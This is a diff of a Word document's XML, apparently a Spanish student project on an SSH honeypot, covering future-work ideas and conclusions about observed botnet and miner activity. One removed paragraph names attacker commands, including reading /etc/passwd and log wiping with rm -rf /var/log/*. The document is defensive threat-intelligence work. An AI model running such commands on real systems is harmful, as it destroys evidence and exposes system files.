+        <w:t xml:space="preserve">aplicar algoritmos de clustering (K-Means, DBSCAN) sobre las sesiones de ataque para identificar grupos de atacantes con comportamientos similares, detectando campañas coordinadas o variantes de un mismo bot. Las características podrían incluir secuencias de comandos, intervalos temporales y credenciales probadas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23999,15 +27381,33 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Pipeline SOAR: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">construir un flujo de respuesta automatizada (Security Orchestration, Automation and Response) que, ante la detección de un ataque significativo, genere automáticamente el ticket correspondiente, notifique al equipo de seguridad y actualice las listas de bloqueo del firewall perimetral.</w:t>
+        <w:t xml:space="preserve">Visualización geográfica interactiva: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">generar un mapa interactivo (Leaflet o Folium) con la distribución geográfica de los atacantes, actualizándose en tiempo real conforme se registran nuevos ataques. Incluir líneas de flujo que muestren las rutas de ataque y heatmaps de densidad por región.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Integración y Automatización</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24028,221 +27428,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Alimentación de feeds de amenazas: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">publicar las IPs atacantes, los hashes de malware y los IOC extraídos como feed de inteligencia en formato STIX/TAXII para su consumo por otros sistemas de seguridad (firewalls, IDS/IPS, SIEMs) y por la comunidad de ciberseguridad a través de plataformas como MISP (Malware Information Sharing Platform).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:keepNext/>
-        <w:pageBreakBefore/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Conclusiones</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Conclusiones Técnicas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El despliegue de un honeypot SSH con Cowrie ha permitido verificar de primera mano la magnitud y la naturaleza de los ataques automatizados que recibe cualquier servidor expuesto a Internet. Desde el momento en que el puerto 22 queda accesible, los intentos de fuerza bruta comienzan en cuestión de minutos, procedentes de IPs distribuidas por todo el mundo. Este dato, aunque conocido en la literatura, adquiere una dimensión diferente cuando se observa en primera persona sobre infraestructura propia.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El análisis de los datos capturados revela patrones consistentes con la literatura especializada y los informes de los principales CERT europeos: predominio de credenciales triviales (root/123456, admin/admin, test/test), ejecución sistemática de comandos de reconocimiento (uname -a, cat /etc/passwd, whoami, id) seguida de intentos de descarga de malware mediante wget y curl, y borrado de huellas (history -c, rm -rf /var/log/*). Este comportamiento secuencial y altamente estandarizado confirma que la inmensa mayoría de los ataques los ejecutan scripts automatizados, no operadores humanos.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">La clasificación MITRE ATT&amp;CK confirma que la actividad observada abarca múltiples tácticas: desde el Acceso Inicial (T1110 – Brute Force) hasta la Evasión de Defensas (T1070 – Indicator Removal on Host), pasando por Ejecución (T1059 – Command and Scripting Interpreter), Descubrimiento (T1082 – System Information Discovery) y Comando y Control. La mayoría de las técnicas observadas se corresponden con las fases tempranas de la cadena de ataque (kill chain), lo que es coherente con el perfil de los atacantes: bots que buscan acceso rápido para el despliegue de criptomineros, la incorporación del servidor a una botnet o el lanzamiento de ataques secundarios.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Conclusiones sobre la Infraestructura</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Desde el punto de vista técnico, el proyecto demuestra que es posible montar una infraestructura de inteligencia de amenazas funcional con software exclusivamente libre y un coste de infraestructura muy reducido. Un servidor pequeño (2 vCPU y 4 GB de RAM) es más que suficiente para ejecutar Cowrie, el sistema operativo y los servicios auxiliares simultáneamente. El cambio forzoso de Oracle Cloud a Hetzner Cloud demostró además el valor de automatizar el despliegue con scripts genéricos: cambiar de proveedor solo afectó a la creación de la máquina.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">La combinación del firewall del proveedor (Cloud Firewall de Hetzner), el firewall del host (iptables) y la redirección NAT proporciona tres capas de protección para el SSH de administración real. El puerto 2022 está expuesto a Internet, pero al aceptar únicamente autenticación por clave y prohibir el acceso como root, los intentos de acceso no autorizados no tienen posibilidad de éxito. Esta arquitectura de defensa en profundidad es trasladable a cualquier entorno de producción.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El script Python desarrollado (cowrie_analyzer.py) automatiza el procesamiento de miles de eventos y genera artefactos visuales directamente utilizables en un informe de seguridad profesional. Su diseño modular permite ampliar el análisis con nuevas métricas sin modificar la estructura existente. El generador de datos de prueba (generate_sample_logs.py) ha permitido desarrollar y validar el script de análisis sin necesidad de esperar a la captura de datos reales, acelerando significativamente el desarrollo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Conclusiones Formativas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Como reflexión profesional, el proyecto ha reforzado competencias transversales del ciclo de ASIR que son directamente aplicables en el mercado laboral:</w:t>
+        <w:t xml:space="preserve">Automatización con Wazuh: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">desarrollar reglas personalizadas y decodificadores en Wazuh que generen alertas en tiempo real cuando se detecten patrones de ataque específicos: más de 100 intentos de login desde la misma IP en una hora, descarga de binarios con hashes conocidos como malware, o ejecución de comandos asociados a técnicas MITRE ATT&amp;CK concretas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24263,15 +27457,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Administración de sistemas Linux en entornos cloud: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">despliegue de servidores, configuración de cortafuegos del proveedor, gestión de claves SSH y conexión remota en Hetzner Cloud, además del uso de la API de Oracle Cloud Infrastructure para automatizar el aprovisionamiento.</w:t>
+        <w:t xml:space="preserve">Pipeline SOAR: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">construir un flujo de respuesta automatizada (Security Orchestration, Automation and Response) que, ante la detección de un ataque significativo, genere automáticamente el ticket correspondiente, notifique al equipo de seguridad y actualice las listas de bloqueo del firewall perimetral.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24292,15 +27486,221 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Seguridad de sistemas: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hardening de SSH, configuración de firewalls (iptables y Cloud Firewall de Hetzner), gestión de claves criptográficas y aplicación de buenas prácticas de seguridad recogidas en benchmarks CIS.</w:t>
+        <w:t xml:space="preserve">Alimentación de feeds de amenazas: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">publicar las IPs atacantes, los hashes de malware y los IOC extraídos como feed de inteligencia en formato STIX/TAXII para su consumo por otros sistemas de seguridad (firewalls, IDS/IPS, SIEMs) y por la comunidad de ciberseguridad a través de plataformas como MISP (Malware Information Sharing Platform).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
+        <w:pageBreakBefore/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones Técnicas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El despliegue de un honeypot SSH con Cowrie ha permitido verificar de primera mano la magnitud y la naturaleza de los ataques automatizados que recibe cualquier servidor expuesto a Internet. El primer ataque llegó 8 minutos después de exponer el puerto 22, y en los tres primeros días se registraron 13 761 conexiones desde 499 IPs. Este dato, aunque conocido en la literatura, adquiere una dimensión diferente cuando se observa en primera persona sobre infraestructura propia.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Los datos confirman que la actividad es casi exclusivamente automática: el primer comando llega en menos de un segundo tras la autenticación y el 85 % de los clientes son bibliotecas de programación. Se distinguen perfiles muy diferentes, desde la fuerza bruta masiva y distribuida, que recolecta credenciales sin llegar a usarlas, hasta botnets consolidadas como Outlaw, que buscan persistencia mediante claves SSH, y mineros como RedTail, preparados para cinco arquitecturas de procesador. También se observaron bots que comprueban si se encuentran en un honeypot, un recordatorio de que el defensor también es observado.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La clasificación MITRE ATT&amp;CK identificó 21 técnicas en 9 tácticas, desde el acceso inicial con cuentas válidas (T1078.003) hasta el secuestro de recursos (T1496.001). La mayoría de las sesiones se concentran en las fases tempranas de la cadena de ataque, coherente con bots que buscan acceso rápido para minar criptomonedas o incorporar el servidor a una botnet. La conclusión defensiva más importante es que tres medidas básicas (SSH solo con clave y sin root, control de integridad de authorized_keys y filtrado del tráfico saliente) habrían neutralizado casi toda la actividad observada.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones sobre la Infraestructura</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Desde el punto de vista técnico, el proyecto demuestra que es posible montar una infraestructura de inteligencia de amenazas funcional con software exclusivamente libre y un coste de infraestructura muy reducido. Un servidor pequeño (2 vCPU y 4 GB de RAM) es más que suficiente para ejecutar Cowrie, el sistema operativo y los servicios auxiliares simultáneamente. El cambio forzoso de Oracle Cloud a Hetzner Cloud demostró además el valor de automatizar el despliegue con scripts genéricos: cambiar de proveedor solo afectó a la creación de la máquina.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La combinación del firewall del proveedor (Cloud Firewall de Hetzner), el firewall del host (iptables) y la redirección NAT proporciona tres capas de protección para el SSH de administración real. El puerto 2022 está expuesto a Internet, pero al aceptar únicamente autenticación por clave y prohibir el acceso como root, los intentos de acceso no autorizados no tienen posibilidad de éxito. Esta arquitectura de defensa en profundidad es trasladable a cualquier entorno de producción.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El script Python desarrollado (cowrie_analyzer.py) automatiza el procesamiento de miles de eventos y genera artefactos visuales directamente utilizables en un informe de seguridad profesional. Su diseño modular permite ampliar el análisis con nuevas métricas sin modificar la estructura existente. El generador de datos de prueba (generate_sample_logs.py) ha permitido desarrollar y validar el script de análisis sin necesidad de esperar a la captura de datos reales, acelerando significativamente el desarrollo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones Formativas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Como reflexión profesional, el proyecto ha reforzado competencias transversales del ciclo de ASIR que son directamente aplicables en el mercado laboral:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24321,15 +27721,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Scripting y automatización: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">desarrollo de scripts Python para el procesamiento de datos JSON, generación de gráficas con matplotlib y consumo de APIs REST.</w:t>
+        <w:t xml:space="preserve">Administración de sistemas Linux en entornos cloud: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">despliegue de servidores, configuración de cortafuegos del proveedor, gestión de claves SSH y conexión remota en Hetzner Cloud, además del uso de la API de Oracle Cloud Infrastructure para automatizar el aprovisionamiento.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24350,15 +27750,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Análisis de logs de seguridad: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">interpretación de eventos de seguridad, identificación de patrones de ataque y correlación de indicadores de compromiso.</w:t>
+        <w:t xml:space="preserve">Seguridad de sistemas: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hardening de SSH, configuración de firewalls (iptables y Cloud Firewall de Hetzner), gestión de claves criptográficas y aplicación de buenas prácticas de seguridad recogidas en benchmarks CIS.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24379,15 +27779,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Inteligencia de amenazas: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">aplicación del marco MITRE ATT&amp;CK para la clasificación de comportamientos adversarios y la formulación de recomendaciones defensivas.</w:t>
+        <w:t xml:space="preserve">Scripting y automatización: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">desarrollo de scripts Python para el procesamiento de datos JSON, generación de gráficas con matplotlib y consumo de APIs REST.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24408,6 +27808,64 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t xml:space="preserve">Análisis de logs de seguridad: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">interpretación de eventos de seguridad, identificación de patrones de ataque y correlación de indicadores de compromiso.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:left="720" w:hanging="357"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Inteligencia de amenazas: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">aplicación del marco MITRE ATT&amp;CK para la clasificación de comportamientos adversarios y la formulación de recomendaciones defensivas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:left="720" w:hanging="357"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">Documentación técnica: </w:t>
       </w:r>
       <w:r>
@@ -25067,6 +28525,70 @@
           <w:szCs w:val="24"/>
         </w:rPr>
